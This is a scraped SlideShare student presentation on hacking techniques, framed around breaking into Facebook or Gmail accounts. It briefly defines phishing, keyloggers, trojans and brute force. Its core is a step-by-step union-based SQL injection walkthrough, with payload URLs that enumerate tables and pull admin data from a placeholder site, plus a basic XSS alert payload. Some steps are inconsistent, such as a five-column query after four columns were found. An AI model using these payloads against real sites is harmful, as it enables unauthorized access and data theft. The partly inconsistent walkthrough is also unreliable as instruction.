SlideShare une entreprise Scribd logo
1  sur  33
Presentation on Hacking
Techniques By
Ishaq Mohammed(15#4Q)
Hacking:
The simple definition of hacking is gaining an unauthorized
access to a computer system,network or servers.
Some Hacking techniques to hack a Facebook or a Gmail
account :
1. Phishing
2. Key Loggers
3.Trojans/Backdoors
What is Phishing ?
It's a way of hacking where a hacker tricks his victim by making him/her login to a
website which is made to look identical to the legitimate one.After a victim login, this
fake website will acquire his information (username and password) and send it to a
hacker.
Key Loggers
1.Trojans are piece of code.
2.Meant for the remote
administration purpose.
3.It may or may not harm your
computer.
Trojans/Backdoors
WebSite Hacking
1.SQL Injection (SQLi)
2.Cross Side Scripting(XSS)
(SQLi) <XSS>
SQL Injection
•SQL Injection is a method of injecting SQL queries into the
website,by injecting our malicious queries hacker can easily
1.By pass the authentication
2.Grab the Structure of the database
3.Grab the sensitive data
•Basically we will divide our SQL
injection Methods into different types,
1.Authentication Bypass
2.Union Based Injection
SQLi methods
Authentication Bypass
To login to the admin login.php page,whenever thea dmin
will enter the admin id and password,a query will executed
on admin login table,the query will look somewhat like,
select * from admin login where admin id=‘<value>’ and
pass=‘<value>’;
i.e. : select * from admin login where admin id=‘admin’ and
pass=‘admin pass
SQL injection is a code injection technique, used to attack data-
driven applications, in which malicious SQL statements are
inserted into an entry field for execution (e.g. to dump the
database contents to the attacker).
Union Based Injection
S_ID S_Name
001 Andy
002 Ishaq
003 Pm
004 Sid
S_ID S_Name
001 Akshay
002 Abhi
003 Rahul
004 Tom
F.Y. (IT)
S.Y. (IT)
E.g.: SELECT S_Name FROM
F.Y.(IT)
UNION
SELECT S_Name FROM S.Y.(IT)
•The result-set will look like this
1) Find something=something in
url,i.e.:id=4,page=2,catid=1,info=9,product=car
http://www.site.com/product.php?id=4
Steps :
After finding
something=something,Apply‘(SingleQuote),
it willlook somewhat like,
http://www.site.com/product.php?id=4’
2) orderby1--(Remove‘)
http://www.site.com/product.php?id=4order by
1--
If the page is loading normally,you need to
proceed to order by2--
Then order by3--until you see some error or
blank page or data missing
Here,orderby5--
giveserror,sothiserrormeansthereare4columns
whichisusedtodisplaythedata.
Here,order by 5--gives error,so this error means
there are 4 columns which is used to display the
data.
3) Union select 1,2,3,4--
:http://www.site.com/product.php?id=4union
select1,2,3,4--
The visible column number is 2 so we can replace.
4) Check version OR database OR user by applying,
union select 1,database(),3,4 --
http://www.site.com/product.php?id=4 union
select1,database(),3,4--
5) To see the table names,
http://www.site.com/product.php?id=5 union select
1,2,table_name,4 from information_schema.tables --
6) Find the column names of the table
http://www.site.com/products.php?id=5 union select
1,2,column_name,4,5 from
information_schema.columnswhere
table_name=‘tbl_admin’ –
7) Get the data from the database.
http://www.site.com/products.php?id=5 union select 1,2,adminid,4
from admin --
1)A type of vulnerability typically found inWeb applications.
2)Enables to inject client-side script into Web pages viewed
by other users.
1. DOM-Based Attack:-
A DOM-Based attack is a more advanced attack where the
attackers payload (malicious script) is executed as a result
of modifying the DOM Environment in the slave's browser
by the original client side script, this causes the client side
code to run in an unexpected manner.
2. Persistent XSS Attack:-
A persistent XSS attack is a method in which the
attackers payload is permanent to the
servers code and will remain there for every user to see
until a server admin removes it.
3. Non-Persistent XSS Attack:-
A non-persistent XSS attack is a method in which the
attackers payload is not permanent, meaning it doesn't
effect the servers internal code. An example of this would
be a link that has a Non-Persistent attack embedded into
it.
What we need to perform it?
I.A vulnerable website
Let’sAttack
II.A textbox (may be searchbox or any text box) in the site
let’s try putting in the most known, BASIC query of all time.
Code:-
<script>alert(“XSS”)</script>
We will get the result of our attack by the XSS code like a
popup box… Like this…
Any password can be cracked using Brute-force attack.
Brute-force attacks try every possible combinations of
numbers, letters and special characters until the
right password is match.
BruteForce Attack
Credits : 1) Lucideus Tech
2) Tyagi Sir
3)Aman Sir
4) Andy
5) Ofcourse me :P

Contenu connexe

Tendances

Unifi securitybugs sep2013
Unifi securitybugs sep2013Unifi securitybugs sep2013
Unifi securitybugs sep2013testslidesha12
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)Ritesh Gupta
 
XSS- an application security vulnerability
XSS-   an application security vulnerabilityXSS-   an application security vulnerability
XSS- an application security vulnerabilitySoumyasanto Sen
 
Two Step Authentication - Chris La Nauze WordPress meetup presentation
Two Step Authentication -  Chris La Nauze WordPress meetup presentationTwo Step Authentication -  Chris La Nauze WordPress meetup presentation
Two Step Authentication - Chris La Nauze WordPress meetup presentationChris La Nauze
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingkinish kumar
 
password cracking and Key logger
password cracking and Key loggerpassword cracking and Key logger
password cracking and Key loggerPatel Mit
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKINGNAWAZ KHAN
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defensesMohammed A. Imran
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingashutosh rai
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingInMobi Technology
 

Tendances (19)

PHP Security Tips
PHP Security TipsPHP Security Tips
PHP Security Tips
 
Password Cracking
Password CrackingPassword Cracking
Password Cracking
 
Unifi securitybugs sep2013
Unifi securitybugs sep2013Unifi securitybugs sep2013
Unifi securitybugs sep2013
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
 
Cross site scripting XSS
Cross site scripting XSSCross site scripting XSS
Cross site scripting XSS
 
XSS- an application security vulnerability
XSS-   an application security vulnerabilityXSS-   an application security vulnerability
XSS- an application security vulnerability
 
Two Step Authentication - Chris La Nauze WordPress meetup presentation
Two Step Authentication -  Chris La Nauze WordPress meetup presentationTwo Step Authentication -  Chris La Nauze WordPress meetup presentation
Two Step Authentication - Chris La Nauze WordPress meetup presentation
 
Brute force
Brute forceBrute force
Brute force
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
password cracking and Key logger
password cracking and Key loggerpassword cracking and Key logger
password cracking and Key logger
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKING
 
XSS
XSSXSS
XSS
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defenses
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)
 
Password Attack
Password AttackPassword Attack
Password Attack
 
Xss (cross site scripting)
Xss (cross site scripting)Xss (cross site scripting)
Xss (cross site scripting)
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site Scripting
 
Mime sniffing
Mime sniffingMime sniffing
Mime sniffing
 

En vedette

En vedette (17)

Basics of Networking
Basics of NetworkingBasics of Networking
Basics of Networking
 
Hardening Routers and Swithches
Hardening Routers and SwithchesHardening Routers and Swithches
Hardening Routers and Swithches
 
Hacking presentation
Hacking presentation Hacking presentation
Hacking presentation
 
Hacking presentation
Hacking presentationHacking presentation
Hacking presentation
 
Sit presentation - Hacking
Sit presentation - HackingSit presentation - Hacking
Sit presentation - Hacking
 
Fun & profit with bug bounties
Fun & profit with bug bountiesFun & profit with bug bounties
Fun & profit with bug bounties
 
Web & Cloud Security in the real world
Web & Cloud Security in the real worldWeb & Cloud Security in the real world
Web & Cloud Security in the real world
 
Hacking presentation
Hacking presentationHacking presentation
Hacking presentation
 
presentation on ethical hacking
 presentation on ethical hacking  presentation on ethical hacking
presentation on ethical hacking
 
My Bug Hunting With Open Source
My Bug Hunting With Open SourceMy Bug Hunting With Open Source
My Bug Hunting With Open Source
 
Prezi : mode d'emploi
Prezi : mode d'emploiPrezi : mode d'emploi
Prezi : mode d'emploi
 
hacking presentation slide
hacking presentation slide hacking presentation slide
hacking presentation slide
 
Secure Shell - a Presentation on Ethical Hacking
Secure Shell - a Presentation on Ethical HackingSecure Shell - a Presentation on Ethical Hacking
Secure Shell - a Presentation on Ethical Hacking
 
Sécurité des systèmes d'information
Sécurité des systèmes d'informationSécurité des systèmes d'information
Sécurité des systèmes d'information
 
Ethical hacking presentation
Ethical hacking presentationEthical hacking presentation
Ethical hacking presentation
 
Hacking ppt
Hacking pptHacking ppt
Hacking ppt
 
Exposé hackers
Exposé hackersExposé hackers
Exposé hackers
 

Similaire à Hacking Techniques

Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Ethical_Hacking_ppt
Ethical_Hacking_pptEthical_Hacking_ppt
Ethical_Hacking_pptNarayanan
 
Seminar2015Bilic_Nicole
Seminar2015Bilic_NicoleSeminar2015Bilic_Nicole
Seminar2015Bilic_NicoleNicole Bili?
 
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptAndrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptSilverGold16
 
Introduction of exploit on window XP & Trick
Introduction of exploit on window XP & Trick Introduction of exploit on window XP & Trick
Introduction of exploit on window XP & Trick Letsfly web
 
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEWEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEAjith Kp
 
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEWEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEAjith Kp
 
STORED XSS IN DVWA
STORED XSS IN DVWASTORED XSS IN DVWA
STORED XSS IN DVWARutvik patel
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSSMike Crabb
 
The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting GuideDaisuke_Dan
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmersrobin_bene
 

Similaire à Hacking Techniques (20)

Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
Ethical_Hacking_ppt
Ethical_Hacking_pptEthical_Hacking_ppt
Ethical_Hacking_ppt
 
Seminar2015Bilic_Nicole
Seminar2015Bilic_NicoleSeminar2015Bilic_Nicole
Seminar2015Bilic_Nicole
 
Codeinjection
CodeinjectionCodeinjection
Codeinjection
 
Security Tech Talk
Security Tech TalkSecurity Tech Talk
Security Tech Talk
 
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptAndrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.ppt
 
Recent cyber Attacks
Recent cyber AttacksRecent cyber Attacks
Recent cyber Attacks
 
Introduction of exploit on window XP & Trick
Introduction of exploit on window XP & Trick Introduction of exploit on window XP & Trick
Introduction of exploit on window XP & Trick
 
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEWEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
 
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEWEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
 
T04505103106
T04505103106T04505103106
T04505103106
 
XSS.pdf
XSS.pdfXSS.pdf
XSS.pdf
 
XSS.pdf
XSS.pdfXSS.pdf
XSS.pdf
 
STORED XSS IN DVWA
STORED XSS IN DVWASTORED XSS IN DVWA
STORED XSS IN DVWA
 
Information security
Information securityInformation security
Information security
 
Real web-attack-scenario
Real web-attack-scenarioReal web-attack-scenario
Real web-attack-scenario
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
 
44641917 091011
44641917 09101144641917 091011
44641917 091011
 
The Cross Site Scripting Guide
The Cross Site Scripting GuideThe Cross Site Scripting Guide
The Cross Site Scripting Guide
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmers
 

Dernier

How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17Celine George
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxVishalSingh1417
 
Micro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdfMicro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdfPoh-Sun Goh
 
On National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan FellowsOn National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan FellowsMebane Rash
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfciinovamais
 
How to Manage Global Discount in Odoo 17 POS
How to Manage Global Discount in Odoo 17 POSHow to Manage Global Discount in Odoo 17 POS
How to Manage Global Discount in Odoo 17 POSCeline George
 
Google Gemini An AI Revolution in Education.pptx
Google Gemini An AI Revolution in Education.pptxGoogle Gemini An AI Revolution in Education.pptx
Google Gemini An AI Revolution in Education.pptxDr. Sarita Anand
 
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...Nguyen Thanh Tu Collection
 
Graduate Outcomes Presentation Slides - English
Graduate Outcomes Presentation Slides - EnglishGraduate Outcomes Presentation Slides - English
Graduate Outcomes Presentation Slides - Englishneillewis46
 
This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.christianmathematics
 
Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Jisc
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 -  Danh muc Sach Giao Khoa 10 . pdf1029 -  Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdfQucHHunhnh
 
Spellings Wk 3 English CAPS CARES Please Practise
Spellings Wk 3 English CAPS CARES Please PractiseSpellings Wk 3 English CAPS CARES Please Practise
Spellings Wk 3 English CAPS CARES Please PractiseAnaAcapella
 
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...christianmathematics
 
General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual  Proper...General Principles of Intellectual Property: Concepts of Intellectual  Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...Poonam Aher Patil
 
Towards a code of practice for AI in AT.pptx
Towards a code of practice for AI in AT.pptxTowards a code of practice for AI in AT.pptx
Towards a code of practice for AI in AT.pptxJisc
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfAdmir Softic
 
Unit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptxUnit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptxVishalSingh1417
 
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptxHMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptxEsquimalt MFRC
 

Dernier (20)

How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17How to Give a Domain for a Field in Odoo 17
How to Give a Domain for a Field in Odoo 17
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptx
 
Micro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdfMicro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdf
 
On National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan FellowsOn National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan Fellows
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdf
 
How to Manage Global Discount in Odoo 17 POS
How to Manage Global Discount in Odoo 17 POSHow to Manage Global Discount in Odoo 17 POS
How to Manage Global Discount in Odoo 17 POS
 
Google Gemini An AI Revolution in Education.pptx
Google Gemini An AI Revolution in Education.pptxGoogle Gemini An AI Revolution in Education.pptx
Google Gemini An AI Revolution in Education.pptx
 
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
TỔNG ÔN TẬP THI VÀO LỚP 10 MÔN TIẾNG ANH NĂM HỌC 2023 - 2024 CÓ ĐÁP ÁN (NGỮ Â...
 
Graduate Outcomes Presentation Slides - English
Graduate Outcomes Presentation Slides - EnglishGraduate Outcomes Presentation Slides - English
Graduate Outcomes Presentation Slides - English
 
This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.This PowerPoint helps students to consider the concept of infinity.
This PowerPoint helps students to consider the concept of infinity.
 
Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 -  Danh muc Sach Giao Khoa 10 . pdf1029 -  Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
 
Spellings Wk 3 English CAPS CARES Please Practise
Spellings Wk 3 English CAPS CARES Please PractiseSpellings Wk 3 English CAPS CARES Please Practise
Spellings Wk 3 English CAPS CARES Please Practise
 
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
Explore beautiful and ugly buildings. Mathematics helps us create beautiful d...
 
General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual  Proper...General Principles of Intellectual Property: Concepts of Intellectual  Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...
 
Towards a code of practice for AI in AT.pptx
Towards a code of practice for AI in AT.pptxTowards a code of practice for AI in AT.pptx
Towards a code of practice for AI in AT.pptx
 
Key note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdfKey note speaker Neum_Admir Softic_ENG.pdf
Key note speaker Neum_Admir Softic_ENG.pdf
 
Unit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptxUnit-IV; Professional Sales Representative (PSR).pptx
Unit-IV; Professional Sales Representative (PSR).pptx
 
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptxHMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
HMCS Max Bernays Pre-Deployment Brief (May 2024).pptx
 
Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024Mehran University Newsletter Vol-X, Issue-I, 2024
Mehran University Newsletter Vol-X, Issue-I, 2024
 

Hacking Techniques

  • 1. Presentation on Hacking Techniques By Ishaq Mohammed(15#4Q)
  • 2.
  • 3. Hacking: The simple definition of hacking is gaining an unauthorized access to a computer system,network or servers.
  • 4.
  • 5. Some Hacking techniques to hack a Facebook or a Gmail account : 1. Phishing 2. Key Loggers 3.Trojans/Backdoors
  • 6. What is Phishing ? It's a way of hacking where a hacker tricks his victim by making him/her login to a website which is made to look identical to the legitimate one.After a victim login, this fake website will acquire his information (username and password) and send it to a hacker.
  • 8. 1.Trojans are piece of code. 2.Meant for the remote administration purpose. 3.It may or may not harm your computer. Trojans/Backdoors
  • 9. WebSite Hacking 1.SQL Injection (SQLi) 2.Cross Side Scripting(XSS) (SQLi) <XSS>
  • 10. SQL Injection •SQL Injection is a method of injecting SQL queries into the website,by injecting our malicious queries hacker can easily 1.By pass the authentication 2.Grab the Structure of the database 3.Grab the sensitive data
  • 11. •Basically we will divide our SQL injection Methods into different types, 1.Authentication Bypass 2.Union Based Injection SQLi methods
  • 12. Authentication Bypass To login to the admin login.php page,whenever thea dmin will enter the admin id and password,a query will executed on admin login table,the query will look somewhat like, select * from admin login where admin id=‘<value>’ and pass=‘<value>’; i.e. : select * from admin login where admin id=‘admin’ and pass=‘admin pass
  • 13. SQL injection is a code injection technique, used to attack data- driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). Union Based Injection
  • 14. S_ID S_Name 001 Andy 002 Ishaq 003 Pm 004 Sid S_ID S_Name 001 Akshay 002 Abhi 003 Rahul 004 Tom F.Y. (IT) S.Y. (IT)
  • 15. E.g.: SELECT S_Name FROM F.Y.(IT) UNION SELECT S_Name FROM S.Y.(IT) •The result-set will look like this
  • 16. 1) Find something=something in url,i.e.:id=4,page=2,catid=1,info=9,product=car http://www.site.com/product.php?id=4 Steps : After finding something=something,Apply‘(SingleQuote), it willlook somewhat like, http://www.site.com/product.php?id=4’
  • 17.
  • 18. 2) orderby1--(Remove‘) http://www.site.com/product.php?id=4order by 1-- If the page is loading normally,you need to proceed to order by2-- Then order by3--until you see some error or blank page or data missing
  • 19. Here,orderby5-- giveserror,sothiserrormeansthereare4columns whichisusedtodisplaythedata. Here,order by 5--gives error,so this error means there are 4 columns which is used to display the data.
  • 20. 3) Union select 1,2,3,4-- :http://www.site.com/product.php?id=4union select1,2,3,4-- The visible column number is 2 so we can replace.
  • 21. 4) Check version OR database OR user by applying, union select 1,database(),3,4 -- http://www.site.com/product.php?id=4 union select1,database(),3,4--
  • 22. 5) To see the table names, http://www.site.com/product.php?id=5 union select 1,2,table_name,4 from information_schema.tables --
  • 23. 6) Find the column names of the table http://www.site.com/products.php?id=5 union select 1,2,column_name,4,5 from information_schema.columnswhere table_name=‘tbl_admin’ –
  • 24. 7) Get the data from the database. http://www.site.com/products.php?id=5 union select 1,2,adminid,4 from admin --
  • 25. 1)A type of vulnerability typically found inWeb applications. 2)Enables to inject client-side script into Web pages viewed by other users.
  • 26. 1. DOM-Based Attack:- A DOM-Based attack is a more advanced attack where the attackers payload (malicious script) is executed as a result of modifying the DOM Environment in the slave's browser by the original client side script, this causes the client side code to run in an unexpected manner.
  • 27. 2. Persistent XSS Attack:- A persistent XSS attack is a method in which the attackers payload is permanent to the servers code and will remain there for every user to see until a server admin removes it.
  • 28. 3. Non-Persistent XSS Attack:- A non-persistent XSS attack is a method in which the attackers payload is not permanent, meaning it doesn't effect the servers internal code. An example of this would be a link that has a Non-Persistent attack embedded into it.
  • 29. What we need to perform it? I.A vulnerable website Let’sAttack II.A textbox (may be searchbox or any text box) in the site
  • 30. let’s try putting in the most known, BASIC query of all time. Code:- <script>alert(“XSS”)</script>
  • 31. We will get the result of our attack by the XSS code like a popup box… Like this…
  • 32. Any password can be cracked using Brute-force attack. Brute-force attacks try every possible combinations of numbers, letters and special characters until the right password is match. BruteForce Attack
  • 33. Credits : 1) Lucideus Tech 2) Tyagi Sir 3)Aman Sir 4) Andy 5) Ofcourse me :P